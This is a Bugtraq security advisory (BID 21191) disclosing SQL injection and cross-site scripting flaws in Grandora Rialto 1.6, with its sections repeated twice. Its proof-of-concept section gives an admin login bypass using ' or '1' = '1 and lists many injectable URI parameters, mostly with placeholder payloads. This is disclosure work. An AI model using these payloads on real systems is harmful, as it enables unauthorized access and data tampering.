Grandora Rialto Multiple SQL Injection and Cross-Site Scripting Vulnerabilities
BID:21191
Info
Grandora Rialto Multiple SQL Injection and Cross-Site Scripting Vulnerabilities
| Bugtraq ID: | 21191 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Nov 20 2006 12:00AM |
| Updated: | Nov 23 2006 05:50PM |
| Credit: | Laurent Gaffié and Benjamin Mossé are credited with the discovery of this vulnerability. |
| Vulnerable: |
Grandora Rialto 1.6 |
| Not Vulnerable: | |
Discussion
Grandora Rialto Multiple SQL Injection and Cross-Site Scripting Vulnerabilities
Grandora Rialto is prone to multiple input-validation vulnerabilities, including SQL-injection and cross-site scripting issues, because it fails to sufficiently sanitize user-supplied data.
Exploiting this issue could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database implementation.
Version 1.6 is vulnerable; other versions may also be affected.
Grandora Rialto is prone to multiple input-validation vulnerabilities, including SQL-injection and cross-site scripting issues, because it fails to sufficiently sanitize user-supplied data.
Exploiting this issue could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database implementation.
Version 1.6 is vulnerable; other versions may also be affected.
Exploit / POC
Grandora Rialto Multiple SQL Injection and Cross-Site Scripting Vulnerabilities
An attacker can exploit these issues via a web client.
The following proof-of-concept URIs are available:
http://www.example.com/admin/default.asp
username: ' or '1' = '1
passwd: ' or '1' = '1
http://www.example.com/listfull.asp?ID='[sql]
http://www.example.com/listmain.asp?cat='[sql]
http://www.example.com/printmain.asp?ID='[sql]
http://www.example.com/searchkey.asp?Keyword='[sql]
http://www.example.com/searchmain.asp?I1=1&area='[sql]
http://www.example.com/searchoption.asp?I12=1&cat='[sql]
http://www.example.com/searchmain.asp?I1=1&area=all&cat='[sql]
http://www.example.com/searchoption.asp?I12=1&cat=all&area='[sql]
http://www.example.com/searchkey.asp?Keyword=1&I1=1&searchin='[sql]
http://www.example.com/searchoption.asp?I12=1&cat=all&area=all&cost1='[sql]
http://www.example.com/searchoption.asp?I12=1&cat=all&area=all&cost1=0&cost2='[sql]
http://www.example.com/searchoption.asp?I12=1&cat=all&area=all&cost1=0&cost2=10000&acreage1='[sql]
http://www.example.com/searchoption.asp?I12=1&cat=all&area=all&cost1=0&cost2=10000&acreage1=0&acreage2=.5&squarefeet1='[sql]
http://www.example.com/listmain.asp?cat=[xss]
http://www.example.com/searchkey.asp?Keyword=[xss]
http://www.example.com/searchmain.asp?I1=1&area=all&cat=[xss]
http://www.example.com/forminfo.asp?refno=[xss]
An attacker can exploit these issues via a web client.
The following proof-of-concept URIs are available:
http://www.example.com/admin/default.asp
username: ' or '1' = '1
passwd: ' or '1' = '1
http://www.example.com/listfull.asp?ID='[sql]
http://www.example.com/listmain.asp?cat='[sql]
http://www.example.com/printmain.asp?ID='[sql]
http://www.example.com/searchkey.asp?Keyword='[sql]
http://www.example.com/searchmain.asp?I1=1&area='[sql]
http://www.example.com/searchoption.asp?I12=1&cat='[sql]
http://www.example.com/searchmain.asp?I1=1&area=all&cat='[sql]
http://www.example.com/searchoption.asp?I12=1&cat=all&area='[sql]
http://www.example.com/searchkey.asp?Keyword=1&I1=1&searchin='[sql]
http://www.example.com/searchoption.asp?I12=1&cat=all&area=all&cost1='[sql]
http://www.example.com/searchoption.asp?I12=1&cat=all&area=all&cost1=0&cost2='[sql]
http://www.example.com/searchoption.asp?I12=1&cat=all&area=all&cost1=0&cost2=10000&acreage1='[sql]
http://www.example.com/searchoption.asp?I12=1&cat=all&area=all&cost1=0&cost2=10000&acreage1=0&acreage2=.5&squarefeet1='[sql]
http://www.example.com/listmain.asp?cat=[xss]
http://www.example.com/searchkey.asp?Keyword=[xss]
http://www.example.com/searchmain.asp?I1=1&area=all&cat=[xss]
http://www.example.com/forminfo.asp?refno=[xss]
Solution / Fix
Grandora Rialto Multiple SQL Injection and Cross-Site Scripting Vulnerabilities
Solution:
Currently we are not aware of any vendor-supplied patches for these issues. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected]:[email protected].
Solution:
Currently we are not aware of any vendor-supplied patches for these issues. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected]:[email protected].
References
Grandora Rialto Multiple SQL Injection and Cross-Site Scripting Vulnerabilities
References:
References:
- Vendor Homepage (Grandora)
- Rialto 1.6[admin login bypass & multiples injections sql] (Laurent Gaffié and Benjamin Mossé)